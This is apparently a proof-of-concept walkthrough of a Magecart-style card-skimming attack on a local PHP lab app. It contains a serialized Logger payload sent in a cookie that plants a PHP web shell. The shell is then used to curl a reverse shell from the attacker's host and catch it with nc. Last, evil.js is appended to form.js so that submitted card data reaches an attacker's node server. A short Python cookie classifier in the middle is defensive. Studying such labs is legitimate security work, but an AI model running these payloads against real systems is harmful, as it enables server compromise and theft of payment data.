sec-js
4/11/2020 - 12:17 AM

Magecartpoc.txt

Exploit Steps

First, in the "app" directory run `php -a`

Then run the following commands:

```
include 'logger-class.php';
$logger = new Logger();
$logger->filename = "./shell.php";
$logger->last_log = '<?php system($_GET["cmd"]); ?>';
$serialized = serialize($logger);
$encoded = urlencode($serialized);
echo($encoded);
```

In order: we first include `logger-class.php`. Then we create a new instance of the Logger class and define some properties on that instance. We set the instance's `filename` to `./shell.php`, which is where the payload will be written, and we set `last_log` to a short piece of PHP that grabs whatever is in the `cmd` query parameter and executes it as a system command. Next, we serialize the logger instance, URL-encode the serialized string so it is safe to put in a cookie, and finally print the resulting string, which is as follows:

`O%3A6%3A%22Logger%22%3A2%3A%7Bs%3A8%3A%22filename%22%3Bs%3A11%3A%22.%2Fshell.php%22%3Bs%3A8%3A%22last_log%22%3Bs%3A30%3A%22%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3B+%3F%3E%22%3B%7D`

Finally, visit your php server and replace the `uinfo` cookie with the encoded string above, or make the following curl request:

```
curl 'http://localhost:8080' -H 'Cookie: uinfo=O%3A6%3A%22Logger%22%3A2%3A%7Bs%3A8%3A%22filename%22%3Bs%3A11%3A%22.%2Fshell.php%22%3Bs%3A8%3A%22last_log%22%3Bs%3A30%3A%22%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3B+%3F%3E%22%3B%7D'
```

Now, visiting `http://localhost:8080/shell.php` with a `cmd` query parameter will execute that shell command. For instance, going to `http://localhost:8080/shell.php?cmd=ls` will list the files in the app's current directory.
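A detection-side check for the cookie abused above, added here as an example and not part of the original PoC: it percent-decodes a cookie value, parses PHP's serialization format far enough to recover the object's class and string properties, and classifies the result. `SAMPLE_COOKIE` is the write-up's own encoded string; the function names are mine.

```python
import re
from urllib.parse import unquote_to_bytes

OBJ_HEADER = re.compile(rb'O:(\d+):"([^"]*)":(\d+):\{')
STR_HEADER = re.compile(rb's:(\d+):"')

# Constructed sample: the urlencoded Logger object the write-up places in the `uinfo` cookie.
SAMPLE_COOKIE = (
    "O%3A6%3A%22Logger%22%3A2%3A%7Bs%3A8%3A%22filename%22%3Bs%3A11%3A%22.%2Fshell.php%22"
    "%3Bs%3A8%3A%22last_log%22%3Bs%3A30%3A%22%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3B+%3F%3E%22%3B%7D"
)

def parse_php_string(data, pos):
    """Parse one s:LEN:"...";  value at pos. LEN counts bytes, so data must be bytes."""
    m = STR_HEADER.match(data, pos)
    if not m:
        raise ValueError("unsupported value type at offset %d" % pos)
    length, start = int(m.group(1)), m.end()
    end = start + length
    if data[end:end + 2] != b'";':
        raise ValueError("declared length does not match the string terminator")
    return data[start:end].decode("utf-8", "replace"), end + 2

def parse_php_object(cookie_value):
    """Return (class_name, {prop: value}) for a serialized object with string properties,
    or None if the cookie is not a serialized object. PHP's urlencode() writes spaces as
    '+' (and literal '+' as %2B), so '+' is restored before percent-decoding."""
    data = unquote_to_bytes(cookie_value.replace("+", " "))
    m = OBJ_HEADER.match(data)
    if not m:
        return None
    class_name, count, pos = m.group(2).decode(), int(m.group(3)), m.end()
    props = {}
    for _ in range(count):
        key, pos = parse_php_string(data, pos)
        value, pos = parse_php_string(data, pos)
        props[key] = value
    return class_name, props

def classify_cookie(cookie_value):
    """'ok': no serialized object. 'object': a serialized object, which an app that only
    expects plain session data should treat as hostile. 'code': a property carries a PHP tag."""
    try:
        parsed = parse_php_object(cookie_value)
    except ValueError:
        return "object"  # object header present but a property type this parser does not handle
    if parsed is None:
        return "ok"
    return "code" if any("<?php" in v for v in parsed[1].values()) else "object"
```

Rejecting any value that classifies as `object` before it reaches `unserialize()` is the cheap fix on the request path; on the PHP side, `unserialize($data, ['allowed_classes' => false])` turns the Logger into a `__PHP_Incomplete_Class`, so no file write happens at all.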

Next, open up `exploit/reverse_shell.php` and update `$ip` to the IP of your host machine. Then, start a web server in the `exploit` directory so the file can be fetched from it. Here is a Bash function that starts a simple one:

```
function server() {
        local port="${1:-5000}";
        # Open the directory listing in the browser once the server is up (`open` is macOS; use `xdg-open` on Linux)
        sleep 1 && open "http://localhost:${port}/" &
        # Set the default Content-Type to `text/plain` instead of `application/octet-stream`
        # And serve everything as UTF-8 (although not technically correct, this doesn’t break anything for binary files)
        python3 -c $'import sys, http.server as h;\nm = h.SimpleHTTPRequestHandler.extensions_map;\nm[""] = "text/plain";\nfor key, value in list(m.items()):\n\tm[key] = value + ";charset=UTF-8";\nh.test(HandlerClass=h.SimpleHTTPRequestHandler, port=int(sys.argv[1]));' "$port";
}
```

Then go to `http://localhost:8080/shell.php?cmd=curl%20http://<ip_and_port_of_server>/reverse_shell.php%20%3E%20reverse_shell.php`. This makes the app server download `reverse_shell.php` from your server into its current directory.

Leave the server running, and in another terminal run `nc -nvl 9002` to set up a listener for our reverse shell, and then go to `http://localhost:8080/reverse_shell.php`. Your listener should connect and you now have a shell on the Docker instance.

Finally, we will inject malicious JavaScript into the page's JavaScript to steal credit cards. In your reverse shell, run `cd /usr/src/myapp/app/assets` and run `curl <ip_and_port_of_server>/evil.js >> form.js`. This appends the contents of evil.js to the app's form.js file.

You can now close the reverse shell and the simple server you had running. To see the fruits of the labor, in the `exploit` directory run `node server.js`. Now, whenever the form at `localhost:8080` is submitted, the node server will print its contents.